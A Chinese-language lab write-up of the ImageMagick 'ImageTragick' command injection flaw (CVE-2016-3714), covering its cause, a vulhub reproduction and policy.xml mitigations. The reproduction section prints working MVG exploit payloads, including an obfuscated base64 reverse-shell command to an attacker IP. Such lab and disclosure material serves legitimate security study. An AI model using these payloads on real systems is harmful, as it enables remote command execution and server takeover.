Imagemagick 命令注入漏洞（CVE-2016-3714）

漏洞介绍

漏洞名称：Imagemagick 命令注入漏洞（CVE-2016-3714）

漏洞定级：高危

漏洞描述：ImageMagick 在处理恶意构造的图片文件时，对于文件中的 URL 未经严格过滤，可导致命令注入漏洞。通过命令注入漏洞，黑客可以在服务器上执行任意系统命令，获取服务器权限。

影响范围：ImageMagick 6.9.3-9本身及以前所有版本

漏洞原理

ImageMagick是一款使用量很广的图片处理程序，很多厂商都调用了这个程序进行图片处理，包括图片的伸缩、切割、水印、格式转换等等。

但有研究者发现，当用户传入一个包含『畸形内容』的图片的时候，就有可能触发命令注入漏洞。

国外的安全人员为此新建了一个网站：https://imagetragick.com/

与这个漏洞相关的CVE有CVE-2016-3714、CVE-2016-3715、CVE-2016-3716、CVE-2016-3717，

其中最严重的就是CVE-2016-3714，利用这个漏洞可以造成远程命令执行的危害。

ImageMagick有一个功能叫做delegate（委托），作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的

参考代码：https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

我们在ImageMagick的默认配置文件里可以看到所有的委托：/etc/ImageMagick/delegates.xml 漏洞报告中给出的POC是利用了如下的这个委托：

<delegate decode="https" command="&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;"/>

它在解析https图片的时候，使用了curl命令将其下载，我们看到%M被直接放在curl的最后一个参数内。

ImageMagick默认支持一种图片格式，叫mvg，而mvg与svg格式类似，其中是以文本形式写入矢量图的内容，而这其中就可以包含https处理过程。

所以我们可以构造一个.mvg格式的图片（但文件名可以不为.mvg，比如下图中包含payload的文件的文件名为vul.gif，而ImageMagick会根据其内容识别为mvg图片），并在https://后面闭合双引号，写入自己要执行的命令：

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://"|id; ")’
pop graphic-context

这样，ImageMagick在正常执行图片转换、处理的时候就会触发漏洞。

漏洞复现

参考链接：https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

使用vulhub靶场进行复现

进入目录：

启动靶场环境：

docker-compose up -d

访问靶场环境

上传poc，新建一个txt文件，内容为：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

将文件保存为poc.gif

上传poc.gif，点击提交，成功执行：

反弹shell POC：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguODEuMjMyLzg4ODggMD4mMQ== | base64 -d | bash`"||id " )'
pop graphic-context

攻击机进行监听

上传 poc1.gif ，执行成功

漏洞修复

关于这个漏洞影响ImageMagick 6.9.3-9以前是所有版本，包括ubuntu源中安装的ImageMagick。而官方在6.9.3-9版本中对漏洞进行了不完全的修复。所以，我们不能仅通过更新ImageMagick的版本来杜绝这个漏洞。

现在，我们可以通过如下两个方法来暂时规避漏洞：

1. 处理图片前，先检查图片的 magic bytes，也就是图片头，如果图片头不是你想要的格式，那么就不调用ImageMagick处理图片。如果你是php用户，可以使用getimagesize函数来检查图片格式，而如果你是wordpress等web应用的使用者，可以暂时卸载ImageMagick，使用php自带的gd库来处理图片。

2. 使用policy file来防御这个漏洞，这个文件默认位置在 /etc/ImageMagick/policy.xml ，我们通过配置如下的xml来禁止解析https等敏感操作：

   <policymap>
   	<policy domain="coder" rights="none" pattern="EPHEMERAL" />
   	<policy domain="coder" rights="none" pattern="URL" />
   	<policy domain="coder" rights="none" pattern="HTTPS" />
   	<policy domain="coder" rights="none" pattern="MVG" />
   	<policy domain="coder" rights="none" pattern="MSL" />
   </policymap> 
   

参考链接

https://www.cnblogs.com/bmjoker/p/9898590.html

https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

https://mp.weixin.qq.com/s/q6jlnlU-hoRkr-vOJUp4LQ